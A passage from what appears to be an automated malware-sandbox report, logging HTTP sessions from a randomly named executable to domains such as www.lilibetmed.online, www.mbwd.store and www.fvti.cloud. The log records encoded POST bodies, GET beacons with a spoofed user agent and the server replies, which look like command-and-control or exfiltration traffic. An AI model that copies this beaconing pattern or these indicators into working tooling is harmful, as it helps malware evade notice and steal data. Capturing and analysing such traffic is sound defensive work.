                        Data Ascii: lt=OTKrJrPoX9LjYb5S1c1cHVz4QBNiDI2Xoe48M6ueMQ1s0GOScEZk46jVqGDliQyyKrOZEu55WGTxyK3d/qpODMD8+CczWsxdhsjtjWw4H09u0jFQzwplR2IR5gOP4b7vSxa5WkervNZ1X8+wYTfTcWDOPSxa5cUC+iWWgHwIy20uxDOv7zaz850UxcjSz0xuaCOqc3PyXkZh746FCKTXDyE=
                        Sep 9, 2024 04:53:20.935451984 CEST716INHTTP/1.1 405 Not Allowed
                        Server: nginx
                        Date: Mon, 09 Sep 2024 02:53:20 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        27192.168.2.449769185.134.245.113802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:53:22.840871096 CEST10879OUTPOST /3cch/ HTTP/1.1
                        Host: www.lilibetmed.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.lilibetmed.online
                        Referer: http://www.lilibetmed.online/3cch/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 4f 54 4b 72 4a 72 50 6f 58 39 4c 6a 59 62 35 53 31 63 31 63 48 56 7a 34 51 42 4e 69 44 49 32 58 6f 65 34 38 4d 36 75 65 4d 51 39 73 30 56 57 53 65 6a 74 6b 35 36 6a 56 70 47 44 65 69 51 79 76 4b 72 58 53 45 75 46 50 57 45 72 78 78 73 6a 64 39 62 70 4f 4e 4d 44 38 6d 79 63 32 4c 63 78 49 68 74 54 58 6a 57 67 34 48 30 39 75 30 68 64 51 6e 56 4a 6c 54 32 49 53 38 51 4f 54 75 72 37 48 53 77 79 50 57 6b 72 51 76 39 35 31 55 63 4f 77 62 6c 7a 54 41 47 44 49 4f 53 77 63 35 63 4a 53 2b 6d 4f 67 67 47 46 74 79 78 63 75 38 47 54 57 68 6e 4b 6e 6f 49 73 59 6c 75 6d 6f 31 6d 56 67 65 67 57 4a 66 6c 65 74 54 32 64 70 38 37 62 7a 59 59 50 4f 66 48 4c 72 32 36 56 43 75 30 74 6b 65 57 2b 2b 66 4f 7a 58 30 50 31 65 4e 74 79 6d 32 35 77 50 52 47 64 53 44 49 59 42 48 51 41 31 52 37 50 71 54 73 73 6b 49 71 67 46 61 4f 53 61 79 32 6f 51 6e 6d 64 50 53 35 6a 74 34 32 68 50 43 30 6f 37 78 48 44 63 35 78 6d 67 65 58 39 38 33 73 50 44 45 6c 69 5a 55 69 30 54 30 5a 71 4c 52 49 33 72 4c 4b 56 64 30 6f 67 4d 31 42 37 [TRUNCATED]
                        Data Ascii: lt=OTKrJrPoX9LjYb5S1c1cHVz4QBNiDI2Xoe48M6ueMQ9s0VWSejtk56jVpGDeiQyvKrXSEuFPWErxxsjd9bpONMD8myc2LcxIhtTXjWg4H09u0hdQnVJlT2IS8QOTur7HSwyPWkrQv951UcOwblzTAGDIOSwc5cJS+mOggGFtyxcu8GTWhnKnoIsYlumo1mVgegWJfletT2dp87bzYYPOfHLr26VCu0tkeW++fOzX0P1eNtym25wPRGdSDIYBHQA1R7PqTsskIqgFaOSay2oQnmdPS5jt42hPC0o7xHDc5xmgeX983sPDEliZUi0T0ZqLRI3rLKVd0ogM1B72LmSXV6Ohor4X4qKOHoGsIrhw20EcJUJ0xFpQs7Rxvm2SoIgpfbok8GuSR/Dx1TYWUuI6+vYSZmTk65pmX1bIxqcWZ5X45mQ4DR2ILf9H8geec+6XnW2hYQZ2OOmC7n+LDqvkPAT+wIWRvav4GZLWlE0H8V40Ni6SO8qEp7+Kk4wz9d7Jl/J1re6NB+BxIUrZFS4ijcV2dY1nFUbPv1TcKmjRoH0E/njDLBsdMZwKXY6+upY/PaQtp6Cd8nfhj/cDdWp9f5qvhd8Kivc+mpEp8XnR4x9A8s5KWJ1eZ6grzVuBzmiKHyQCQtS1X8LSuibhoQ71IKP38TDtANHzWlKurfa1WkuYZ5/eMLPGnVknq3HSjpeHfoNAWTKmxHm2ZCAJzrVsKhklPct7EL50uKujkb1LD9NgWjAv1Bg8A3Fua5Qq2RTi+ZXqonhxq8qhGRoUPa5Ij80KLAvnGKN5JL2m/wVeg20ii26NRQ+IwfK5q1rGGdcQ5pV5BUjcY+mR64rWh8kSHfIk76L8hc2SvE7wIKwfLw1qe9y6wNAoofC+yfQVqbhetVmXSxeCpwxJFQXtQ4qzq4WLniHB4dAeVye1Af+tF0j1hxLHRE2lwGJWg3F1t6jXi3MFbEGadZQl7UkrTH0yA/mzSKK2hbQeS54JGzcLq3KWiUzkC [TRUNCATED]
                        Sep 9, 2024 04:53:23.485428095 CEST716INHTTP/1.1 405 Not Allowed
                        Server: nginx
                        Date: Mon, 09 Sep 2024 02:53:23 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        28192.168.2.449770185.134.245.113802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:53:25.387787104 CEST498OUTGET /3cch/?3ry=nj20Xr&lt=DRiLKdz0S/bqEudf8+lJZmKhIEkCV4eCneZlIdHidh1UyVXSe2F494jKrmXjvhSAferATdA1WGLj27vrwJsZD/LqvQNnepl3kdPcsh0FNk4E92FpuHIxGGI= HTTP/1.1
                        Host: www.lilibetmed.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:53:26.012362003 CEST1236INHTTP/1.1 200 OK
                        Server: nginx
                        Date: Mon, 09 Sep 2024 02:53:25 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Expires: Mon, 09 Sep 2024 03:53:25 GMT
                        Cache-Control: max-age=3600
                        Cache-Control: public
                        Data Raw: 31 35 33 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 75 6e 79 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 69 6c 69 62 65 74 6d 65 64 2e 6f 6e 6c 69 6e 65 20 69 73 20 70 61 72 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f [TRUNCATED]
                        Data Ascii: 153f<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.lilibetmed.online is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.log
                        Sep 9, 2024 04:53:26.012377977 CEST1236INData Raw: 6f 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 35 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20
                        Data Ascii: o { width: auto; max-height: 50px; margin-top: 30px; border: 0; } .logocont { text-align: center; } .langselect { position: absolute; top: 10px; right: 1
                        Sep 9, 2024 04:53:26.012388945 CEST1236INData Raw: 69 76 65 20 77 65 62 73 69 74 65 20 68 65 72 65 2e 20 3c 62 72 3e 4f 74 68 65 72 20 73 65 72 76 69 63 65 73 2c 20 73 75 63 68 20 61 73 20 65 2d 6d 61 69 6c 2c 20 6d 61 79 20 62 65 20 61 63 74 69 76 65 6c 79 20 75 73 65 64 20 62 79 20 74 68 65 20
                        Data Ascii: ive website here. <br>Other services, such as e-mail, may be actively used by the owner.<br><br><a href="https://www.domainnameshop.com/whois">Who owns the domain?</a>', no: punycode.toUnicode('www.lilibetmed.online') + ' er registrert
                        Sep 9, 2024 04:53:26.012435913 CEST1236INData Raw: 0a 0a 20 20 20 20 20 20 76 61 72 20 69 20 3d 20 74 79 70 65 6f 66 20 53 56 47 52 65 63 74 20 21 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 3f 20 22 73 76 67 22 20 3a 20 22 70 6e 67 22 3b 0a 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 71 28 73
                        Data Ascii: var i = typeof SVGRect != "undefined" ? "svg" : "png"; function q(s) { return document.getElementById(s); } </script> <div class="container"> <h1 id="t"> www.lilibetmed.online is park
                        Sep 9, 2024 04:53:26.012445927 CEST766INData Raw: 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 66 6c 61 67 2d 65 6e 2e 70 6e 67 22 0a 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 45 6e 67 6c 69 73 68 22 0a 20 20 20 20 20 20 20 20 20 20 74 69 74 6c 65 3d 22 45
                        Data Ascii: img src="/images/flag-en.png" alt="English" title="English" onclick="setLang('en')" /> </div> </div> <div class="footer"> <span >Domeneshop AS &copy; 2024</spa


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        29192.168.2.449771103.42.108.46802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:53:31.381803989 CEST756OUTPOST /pn1r/ HTTP/1.1
                        Host: www.mbwd.store
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.mbwd.store
                        Referer: http://www.mbwd.store/pn1r/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 74 49 50 73 38 6b 38 6c 36 4a 71 66 33 46 52 4b 50 70 37 49 6f 67 4c 54 76 6e 7a 4a 69 58 64 4d 36 30 4e 62 32 42 66 4c 77 54 35 46 72 49 75 79 33 2f 4a 48 32 57 45 6f 45 68 55 4a 41 74 57 59 6f 4b 79 31 65 6c 31 6d 51 34 71 50 68 35 47 6b 77 58 32 57 71 42 76 51 38 2f 61 55 6b 6b 79 55 46 47 30 6a 5a 53 31 5a 59 69 53 32 47 64 54 76 49 53 59 6f 5a 61 38 4f 7a 2b 50 53 6e 36 73 34 69 75 30 61 59 53 75 46 31 6f 71 71 6d 55 4b 65 37 39 6c 44 69 6f 4c 31 65 66 4b 4a 79 46 30 76 48 38 62 7a 4f 34 33 64 57 79 56 5a 79 37 6a 4c 71 33 6d 6a 5a 36 48 34 6f 49 38 70 43 6d 69 76 75 77 3d 3d
                        Data Ascii: lt=tIPs8k8l6Jqf3FRKPp7IogLTvnzJiXdM60Nb2BfLwT5FrIuy3/JH2WEoEhUJAtWYoKy1el1mQ4qPh5GkwX2WqBvQ8/aUkkyUFG0jZS1ZYiS2GdTvISYoZa8Oz+PSn6s4iu0aYSuF1oqqmUKe79lDioL1efKJyF0vH8bzO43dWyVZy7jLq3mjZ6H4oI8pCmivuw==
                        Sep 9, 2024 04:53:32.245316982 CEST154INHTTP/1.1 403 Forbidden
                        Content-Type: text/plain; charset=utf-8
                        Date: Mon, 09 Sep 2024 02:53:32 GMT
                        Content-Length: 11
                        Connection: close
                        Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                        Data Ascii: Bad Request


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        30192.168.2.449772103.42.108.46802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:53:33.943371058 CEST776OUTPOST /pn1r/ HTTP/1.1
                        Host: www.mbwd.store
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.mbwd.store
                        Referer: http://www.mbwd.store/pn1r/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 74 49 50 73 38 6b 38 6c 36 4a 71 66 6c 78 56 4b 63 2b 76 49 74 41 4c 63 7a 33 7a 4a 73 33 64 49 36 30 78 62 32 45 76 62 78 68 4e 46 72 71 6d 79 30 2b 4a 48 37 32 45 6f 50 42 55 47 64 64 57 6c 6f 4b 2b 54 65 67 56 6d 51 37 57 50 68 39 43 6b 78 67 61 58 70 78 76 4f 31 66 61 46 67 6b 79 55 46 47 30 6a 5a 53 67 45 59 69 4b 32 48 75 37 76 50 44 59 6e 46 4b 38 42 77 2b 50 53 31 4b 73 38 69 75 30 34 59 51 4b 72 31 71 53 71 6d 52 75 65 37 73 6c 4d 74 6f 4c 4a 61 66 4c 32 2b 30 52 47 42 64 7a 37 47 61 75 39 57 69 41 37 7a 39 79 52 37 47 48 30 4c 36 6a 4c 31 50 31 64 50 6c 66 6d 31 2f 4d 38 63 61 48 33 7a 35 4f 32 46 72 7a 37 6b 38 67 77 72 4c 34 3d
                        Data Ascii: lt=tIPs8k8l6JqflxVKc+vItALcz3zJs3dI60xb2EvbxhNFrqmy0+JH72EoPBUGddWloK+TegVmQ7WPh9CkxgaXpxvO1faFgkyUFG0jZSgEYiK2Hu7vPDYnFK8Bw+PS1Ks8iu04YQKr1qSqmRue7slMtoLJafL2+0RGBdz7Gau9WiA7z9yR7GH0L6jL1P1dPlfm1/M8caH3z5O2Frz7k8gwrL4=
                        Sep 9, 2024 04:53:34.811379910 CEST154INHTTP/1.1 403 Forbidden
                        Content-Type: text/plain; charset=utf-8
                        Date: Mon, 09 Sep 2024 02:53:34 GMT
                        Content-Length: 11
                        Connection: close
                        Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                        Data Ascii: Bad Request


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        31192.168.2.449773103.42.108.46802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:53:36.491148949 CEST10858OUTPOST /pn1r/ HTTP/1.1
                        Host: www.mbwd.store
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.mbwd.store
                        Referer: http://www.mbwd.store/pn1r/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 74 49 50 73 38 6b 38 6c 36 4a 71 66 6c 78 56 4b 63 2b 76 49 74 41 4c 63 7a 33 7a 4a 73 33 64 49 36 30 78 62 32 45 76 62 78 68 56 46 6f 59 65 79 6d 64 68 48 36 32 45 6f 43 68 55 46 64 64 57 30 6f 4a 4f 66 65 67 52 32 51 2b 53 50 68 65 4b 6b 32 56 75 58 2b 42 76 4f 33 66 62 43 6b 6b 7a 4d 46 47 6c 6b 5a 52 59 45 59 69 4b 32 48 72 2f 76 5a 43 59 6e 57 36 38 4f 7a 2b 50 57 6e 36 74 72 69 75 73 43 59 51 65 56 30 5a 61 71 6e 78 2b 65 33 36 4a 4d 6b 6f 4c 50 64 66 4c 75 2b 30 74 64 42 64 75 41 47 62 62 71 57 67 63 37 77 71 50 61 6f 33 58 79 64 62 2f 32 67 38 52 6b 4e 31 62 4b 73 65 4d 6c 4d 4b 71 76 73 35 57 55 4f 72 71 31 2f 73 6b 6e 78 76 47 45 47 49 62 53 45 4d 7a 54 2f 6d 67 79 49 42 39 59 62 42 6c 53 39 4b 70 71 6f 39 58 63 4d 66 2b 38 6a 57 55 4c 46 47 71 59 32 57 68 47 77 54 61 4d 4a 43 41 65 6d 78 6f 33 53 39 57 74 31 47 63 6c 65 35 4e 5a 2b 71 7a 4b 39 34 68 72 76 52 33 74 46 58 51 4e 6b 41 54 66 33 64 59 31 2f 76 7a 45 34 50 48 43 5a 4d 76 47 42 53 31 54 65 6b 41 57 49 6a 33 34 56 41 43 [TRUNCATED]
                        Data Ascii: lt=tIPs8k8l6JqflxVKc+vItALcz3zJs3dI60xb2EvbxhVFoYeymdhH62EoChUFddW0oJOfegR2Q+SPheKk2VuX+BvO3fbCkkzMFGlkZRYEYiK2Hr/vZCYnW68Oz+PWn6triusCYQeV0Zaqnx+e36JMkoLPdfLu+0tdBduAGbbqWgc7wqPao3Xydb/2g8RkN1bKseMlMKqvs5WUOrq1/sknxvGEGIbSEMzT/mgyIB9YbBlS9Kpqo9XcMf+8jWULFGqY2WhGwTaMJCAemxo3S9Wt1Gcle5NZ+qzK94hrvR3tFXQNkATf3dY1/vzE4PHCZMvGBS1TekAWIj34VAC3I7p+9mf5Ghc/4zmrfX8I55sCPMDJDHDJXigt33cTjo9YP9O+2riGduBc9NgBXcKV6VxRlQcrIOSX2uAaaV6js1RJdKW5iKGWPWZUXuBUSeKsNNwpi54JL1kcsGimRfZ6Q0zaazRN9055rOS62JPP0bESIV2JyMtsml+60dZjpHtOqboJdwsCRcrt4RqBcS7QYIXG+ZA9DQMg9SkBKmrPb1k2jWKr1F5dDo9HbbF5iZO/dXCu1GY+Xa150DYdTx7OCdxIHudaXFISkP4VB9NopteBAssBttW7FNw7MdaSHJuDgXZ189c1ozDChed8PbE4+j4LktAeJp0nI4aNfYvXCvqS2Rs9w8ZjFmXIkCUYWEbL6+Qkz3ry/E3NAYNV1lIL7jicVi3PCv0z41zhweLdltEHDax5qDx9HhQXFD+OfX9cO8eeE+YJal4IIQoaXiM7kxvWZ675KVkvgjzfH9tgrGaghNf/GynUHnE4k0bG6HV2LRmejYLklO3rD1e5SiNclLoq0dvSJEB7EFo3inKL9vBYQpsCL5vH430vk3B4Gk09i/OVzDi3uz/4n28cMhw23MgtVGxTMyGMfHmFWhDeLayZjCZF155zhjGA7tlHjYtMSxag0Ji4eOo/5coPgT/3G6qqmjTZCyIF6X3n+2Xj/U1D+BoHGKMBy [TRUNCATED]


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        32192.168.2.449774103.42.108.46802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:53:39.041815042 CEST491OUTGET /pn1r/?lt=gKnM/UYa57ur7VVzNcvkzBuMpwTVzE14/GtRoFWV9RJaxqyHi91lxRYvKS9XNcGV9MGsPko/NpaB+uWz1UCX1wHhyYSOikvVIVM8anokYkTUErXORgkeTZM=&3ry=nj20Xr HTTP/1.1
                        Host: www.mbwd.store
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:53:39.898190022 CEST154INHTTP/1.1 403 Forbidden
                        Content-Type: text/plain; charset=utf-8
                        Date: Mon, 09 Sep 2024 02:53:39 GMT
                        Content-Length: 11
                        Connection: close
                        Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                        Data Ascii: Bad Request


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        33192.168.2.44977538.55.112.70802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:53:53.483823061 CEST756OUTPOST /dw6h/ HTTP/1.1
                        Host: www.fvti.cloud
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.fvti.cloud
                        Referer: http://www.fvti.cloud/dw6h/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 63 39 42 6b 2f 39 32 58 63 6d 32 4c 2f 31 62 45 72 59 74 63 51 79 44 4f 78 66 35 68 33 77 2f 57 4f 56 6a 46 46 6a 2b 4e 52 2b 48 69 42 66 33 7a 46 6d 53 79 74 72 61 4e 79 73 38 53 42 32 56 6e 76 66 2b 36 4b 4d 65 74 58 75 46 6e 57 78 35 6e 75 33 55 32 38 4c 46 2f 6f 38 57 63 55 33 36 50 32 55 41 67 52 55 76 33 71 38 39 6f 7a 7a 6c 65 34 75 31 4b 77 4e 30 38 6d 52 59 44 77 71 35 76 6a 67 37 6a 42 55 67 67 33 69 35 6d 64 64 69 62 4f 2f 73 78 38 74 41 64 68 6c 53 4e 65 65 47 6f 71 44 36 30 57 45 6f 48 6d 48 71 32 45 74 71 5a 66 44 4d 36 38 2f 50 6a 30 4a 52 4c 6e 66 51 45 61 51 3d 3d
                        Data Ascii: lt=c9Bk/92Xcm2L/1bErYtcQyDOxf5h3w/WOVjFFj+NR+HiBf3zFmSytraNys8SB2Vnvf+6KMetXuFnWx5nu3U28LF/o8WcU36P2UAgRUv3q89ozzle4u1KwN08mRYDwq5vjg7jBUgg3i5mddibO/sx8tAdhlSNeeGoqD60WEoHmHq2EtqZfDM68/Pj0JRLnfQEaQ==
                        Sep 9, 2024 04:53:54.399895906 CEST635INHTTP/1.1 200 OK
                        Server: nginx
                        Date: Mon, 09 Sep 2024 02:53:54 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Content-Encoding: gzip
